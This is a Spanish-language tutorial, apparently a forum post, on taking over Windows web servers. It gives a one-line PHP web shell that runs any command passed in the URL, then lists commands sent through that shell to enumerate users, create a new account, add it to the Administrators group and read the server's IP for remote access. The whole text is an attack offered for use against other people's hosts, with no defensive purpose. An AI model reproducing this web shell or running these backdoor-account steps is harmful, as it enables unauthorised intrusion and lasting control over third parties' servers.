Hola gente, aquí les vengo a enseñar como elevar privilegios en servidores windows.
1- Bueno primero necesitan tener subida una shell a una web o host.
2- Después tener un archivo shell server windows subido en la web o host.
El código que insertaremos es este:
<?php system($_GET['cmd']); ?>
Ya con el archivo subido van al link
website.com/archivo.php?cmd=whoami y les tiene que aparecer NT
AUTORITHY/SYSTEM si no les sale nada o les sale NT es porque no tiene servidor vps la web o host.
Ya realizado lo anterior ahora ponemos:
website.com/archivo.php?cmd=net user para ver los usuarios que tiene el servidor VPS.
Ya que hecho esto, ponemos:
website.com/archivo.php?cmd=net user (NOMBRE DEL USUARIO QUE VAN A CREAR) (CONTRASEÑA QUE VAN A PONERLE) /add esto es para crear el usuario, sin los paréntesis.
Bueno ya hecho esto nos aparecerá (THE COMMAND COMPLETED SUCCESSFULLY) y hacemos lo siguiente:
website.com/archivo.php?cmd=net user para ver nuestro usuario añadido si no sale es que hicieron algo mal.
Ahora hacemos esto:
website.com/archivo.php?cmd=net localgroup Administrators (NOMBRE DEL USUARIO QUE HAN CREADO) /add y tiene que salir (THE COMMAND COMPLETED SUCCESSFULLY) esto es para darnos privilegios de Administrador en el servidor vps, sin los paréntesis.
Ahora para saber la IP del servidor VPS ponemos:
website.com.com/archivo.php?cmd=ipconfigYa hecho todos estos pasos, podremos acceder al servidor vps como un Administrador.
Saludos.